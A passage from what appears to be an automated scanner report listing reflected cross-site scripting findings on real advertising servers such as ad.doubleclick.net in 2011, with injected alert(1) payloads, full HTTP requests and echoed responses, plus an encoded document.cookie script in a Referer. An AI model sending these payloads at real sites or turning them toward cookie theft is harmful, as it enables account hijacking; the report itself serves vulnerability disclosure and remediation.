Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";

...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.msn-dm/B2343920.67

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4153

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
.net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 3
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.msn-dm/B2343920.67

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4163

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/dmd.ehow/computers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/dmd.ehow/computers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 593

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/dmd.ehow/homepage

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:28:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

1.25. http://ad.harrenmedianetwork.com/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x60097345'-alert(1)-'e55a08937c8&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x60097345%27-alert%281%29-%27e55a08937c8%26s%3D429613%26_salt%3D975924496%26B%3D10%
...[SNIP]...

1.26. http://ad.harrenmedianetwork.com/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613d6cd7'-alert(1)-'948355e44c0&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D429613d6cd7%27-alert%281%29-%27948355e44c0%26_salt%3D975924496%26B%3D10%26u%3Dhttp%253A%
...[SNIP]...

1.27. http://ad.harrenmedianetwork.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x6008e920'-alert(1)-'fcb38195981&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x6008e920%27-alert%281%29-%27fcb38195981%26section%3D429613">
...[SNIP]...

1.28. http://ad.harrenmedianetwork.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&inv_code=429613&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&s=429613&t=2" target="parent">
...[SNIP]...

1.29. http://ad.harrenmedianetwork.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
